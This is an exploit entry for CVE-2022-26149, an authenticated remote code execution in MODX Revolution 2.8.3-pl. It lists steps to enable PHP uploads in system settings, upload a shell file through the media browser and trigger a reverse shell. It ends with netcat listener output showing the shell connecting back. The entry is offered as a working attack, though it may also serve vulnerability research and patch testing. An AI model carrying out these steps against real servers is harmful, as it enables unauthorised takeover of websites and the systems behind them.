MODX Revolution v2.8.3-pl Exploit, Authenticated Remote Code Execution

# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 26th Feb'2022
# CVE ID: CVE-2022-26149
# Confirmed on release 2.8.3-pl
# Reference:
# Vendor:

#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
        Add the php file extension under the "Uploadable File Types" option available in "System Settings"
#Step3- Now Goto Media=>Media Browser and upload the Shell.php
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:

listening on [any] 4477 ...
connect to [] from (UNKNOWN) [] 58056
bash: cannot set terminal process group (1445): Inappropriate ioctl for device
bash: no job control in this shell

